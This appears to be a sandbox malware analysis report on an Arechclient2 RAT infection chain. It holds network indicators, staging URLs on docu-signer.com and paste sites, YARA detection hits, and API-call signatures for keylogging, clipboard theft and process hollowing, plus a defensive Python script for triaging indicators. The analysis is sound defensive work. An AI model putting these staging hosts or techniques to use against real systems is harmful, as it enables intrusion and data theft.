                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49790 version: TLS 1.2
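The URL and network entries above are the raw material for IOC extraction, but most of them are noise: PowerShell help links (aka.ms, contoso.com, nuget.org), AutoIt runtime and CA strings, Google abuse-redirect URLs, and the IRS-themed decoy document's links. The entries worth pivoting on are the docu-signer.com staging URLs (updater.bin, log4cxx.dll), the nopaste.net and pastebin.com raw-paste URLs, and the per-IP count of TLS sessions. The following is an added example, not Joe Sandbox's or the report's own code: a parser for the flattened "Source: ...String found in binary or memory: <url>" and "HTTPS traffic detected: <ip>:443 -> <client>:<port>" lines as this page renders them, with an allowlist that is my assumption rather than anything the report states. Strings carved from memory often run into the next string (https://docu-signer.comD, https://www.google.comHr), so the parser also applies a labelled heuristic to trim the host. The sample lines are a constructed excerpt of the entries in this section.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed excerpt of the report lines in the section above. The page renders
# the Source column and the description column run together, so a URL line
# looks like "...sdmpString found in binary or memory: <url>".
SAMPLE_LINES = [
    "Source: powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin",
    "Source: powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.comD",
    "Source: powershell.exe, 00000004.00000002.3838008180.00000000008C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nopaste.net/SFHgtxFGtB",
    "Source: MSBuild.exe, 00000016.00000002.1975336406.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQPO",
    "Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js",
    "Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/form1040",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443",
    "Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.8:49710 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49714 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49733 version: TLS 1.2",
]

URL_RE = re.compile(r"^Source: (?P<src>.+?)String found in binary or memory: (?P<url>\S+)$")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (?P<srv>[\d.]+):\d+ -> [\d.]+:(?P<cport>\d+) version: (?P<ver>TLS [\d.]+)"
)

# Assumed allowlist (not part of the report): domains that show up in this run
# as noise from PowerShell help text, the AutoIt runtime, CA/CRL URLs and the
# IRS-themed decoy document. Keep it explicit so an analyst can review it.
ALLOWLIST = {
    "google.com", "irs.gov", "ssa.gov", "rrb.gov", "improveirs.org", "aka.ms",
    "contoso.com", "github.com", "nuget.org", "apache.org", "globalsign.com",
    "autoitscript.com", "lencr.org",
}


def clean_memory_url(url):
    """Strings carved from memory often run into the next string, giving hosts
    like 'docu-signer.comD' or 'www.google.comHr'. Heuristic (an assumption):
    cut the last host label at its first upper-case character. Paths are left
    alone, since trailing path bytes cannot be told apart from real ones."""
    p = urlsplit(url)
    labels = p.netloc.split(".")
    m = re.search(r"[A-Z]", labels[-1])
    if m:
        labels[-1] = labels[-1][: m.start()]
    return urlunsplit((p.scheme, ".".join(labels), p.path, p.query, p.fragment))


def is_allowlisted(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWLIST)


def parse_report(lines):
    """Collect URL -> {sources it was found in} and one record per TLS session."""
    urls = defaultdict(set)
    tls = []
    for line in lines:
        m = URL_RE.match(line)
        if m:
            # "powershell.exe, 00000004....sdmp" -> process; dropped files have no comma
            source = m.group("src").split(",")[0].strip()
            urls[clean_memory_url(m.group("url"))].add(source)
            continue
        m = TLS_RE.search(line)
        if m:
            tls.append((m.group("srv"), int(m.group("cport")), m.group("ver")))
    return {"urls": dict(urls), "tls": tls}


def triage_urls(urls):
    """URLs whose host is outside the allowlist, with the sources that held them."""
    flagged = []
    for url, sources in urls.items():
        if not is_allowlisted(urlsplit(url).netloc):
            flagged.append((url, sorted(sources)))
    return sorted(flagged)


def tls_sessions_by_server(tls):
    """How many TLS sessions the sandbox VM opened to each server IP."""
    return Counter(srv for srv, _, _ in tls)


if __name__ == "__main__":
    report = parse_report(SAMPLE_LINES)
    for url, sources in triage_urls(report["urls"]):
        print(f"{url:60} found in {', '.join(sources)}")
    for srv, n in tls_sessions_by_server(report["tls"]).most_common():
        print(f"{srv:18} {n} TLS session(s)")
```

Run against the sample, the triage leaves exactly the docu-signer.com, nopaste.net and pastebin.com entries, attributed to the powershell.exe and MSBuild.exe memory they were carved from; the "HTTP traffic on port N -> 443" lines carry no endpoint and are only useful once joined to a matching "HTTPS traffic detected" line on the same client port, which is why the parser keys TLS records by client port.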

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712BEE0 SetWindowsHookExW 0000000D,00000000,?,?15_2_0712BEE0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01034632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_01034632
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01034830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_01034830
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A14830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00A14830
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01020508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,14_2_01020508
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0104D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_0104D164
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A2D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00A2D164
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016070C9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,14_2_016070C9

                    System Summary

                    Source: amsi32_7608.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A551 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,14_2_0160A551
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A82A9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,16_2_010A82A9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024365: CreateFileW,_memset,DeviceIoControl,CloseHandle,14_2_01024365
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01018F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_01018F2E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01025778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_01025778
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A05778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00A05778
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_006D00404_2_006D0040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_006D00124_2_006D0012
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0077F4D04_2_0077F4D0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCB02014_2_00FCB020
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC166314_2_00FC1663
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC9C8014_2_00FC9C80
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE23F514_2_00FE23F5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0104840014_2_01048400
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF650214_2_00FF6502
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCE6F014_2_00FCE6F0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF265E14_2_00FF265E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE282A14_2_00FE282A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF89BF14_2_00FF89BF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF6A7414_2_00FF6A74
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD0BE014_2_00FD0BE0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01040A3A14_2_01040A3A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0101EDB214_2_0101EDB2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FECD5114_2_00FECD51
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF6FE614_2_00FF6FE6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01028E4414_2_01028E44
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01040EB714_2_01040EB7
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE33B714_2_00FE33B7
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FC94E014_2_00FC94E0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDD45D14_2_00FDD45D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEF40914_2_00FEF409
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE16B414_2_00FE16B4
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FCF6A014_2_00FCF6A0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDF62814_2_00FDF628
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE78C314_2_00FE78C3
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE1BA814_2_00FE1BA8
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEDBA514_2_00FEDBA5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF9CE514_2_00FF9CE5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FDDD2814_2_00FDDD28
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEBFD614_2_00FEBFD6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE1FC014_2_00FE1FC0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA214_2_01609EA2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA914_2_01609EA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129C88015_2_0129C880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129D11015_2_0129D110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129B01F15_2_0129B01F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129107015_2_01291070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_012915E015_2_012915E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129A90815_2_0129A908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129A8FA15_2_0129A8FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129106015_2_01291060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129B09E15_2_0129B09E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129D0F315_2_0129D0F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_012915C315_2_012915C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129BD7815_2_0129BD78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0129BD4515_2_0129BD45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538379815_2_05383798
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538DF9015_2_0538DF90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053827F815_2_053827F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538511815_2_05385118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538004015_2_05380040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05381F6315_2_05381F63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05381FB015_2_05381FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538378815_2_05383788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538DF8015_2_0538DF80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538C7D815_2_0538C7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053827DA15_2_053827DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538C7C915_2_0538C7C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538CE6B15_2_0538CE6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538CE8015_2_0538CE80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0538000715_2_05380007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05383BE015_2_05383BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05383BCC15_2_05383BCC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A1E61015_2_05A1E610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A1F9E815_2_05A1F9E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_05A14CC015_2_05A14CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB4A2815_2_06FB4A28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBDBA015_2_06FBDBA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB3B4015_2_06FB3B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB1B0F15_2_06FB1B0F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBC5F815_2_06FBC5F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB9AD815_2_06FB9AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB4A1315_2_06FB4A13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB021015_2_06FB0210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBDB9015_2_06FBDB90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB3B2315_2_06FB3B23
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB785815_2_06FB7858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FB985115_2_06FB9851
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBBDE015_2_06FBBDE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06FBA5E015_2_06FBA5E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712472815_2_07124728
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712AF4815_2_0712AF48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071216C815_2_071216C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122EF015_2_07122EF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712DDEC15_2_0712DDEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07120C0815_2_07120C08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712735815_2_07127358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712538815_2_07125388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712D3CE15_2_0712D3CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071233F815_2_071233F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712622815_2_07126228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071216B915_2_071216B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712C51815_2_0712C518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712C50915_2_0712C509
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07120C0715_2_07120C07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122C3315_2_07122C33
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122C4015_2_07122C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712537B15_2_0712537B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071203D815_2_071203D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07122BEF15_2_07122BEF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712621815_2_07126218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269B615_2_071269B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269B815_2_071269B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_071269C115_2_071269C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712000615_2_07120006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712803215_2_07128032
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078C751815_2_078C7518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078CD57015_2_078CD570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_078C5F4C15_2_078C5F4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9004015_2_07E90040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E94DC915_2_07E94DC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E94DD815_2_07E94DD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9071915_2_07E90719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E906BE15_2_07E906BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9442815_2_07E94428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9002715_2_07E90027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_07E9443815_2_07E94438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_053850EB15_2_053850EB
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AB02016_2_009AB020
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A166316_2_009A1663
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A9C8016_2_009A9C80
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C23F516_2_009C23F5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A2840016_2_00A28400
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D650216_2_009D6502
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AE6F016_2_009AE6F0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D265E16_2_009D265E
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C282A16_2_009C282A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D89BF16_2_009D89BF
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A20A3A16_2_00A20A3A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D6A7416_2_009D6A74
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009B0BE016_2_009B0BE0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009FEDB216_2_009FEDB2
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CCD5116_2_009CCD51
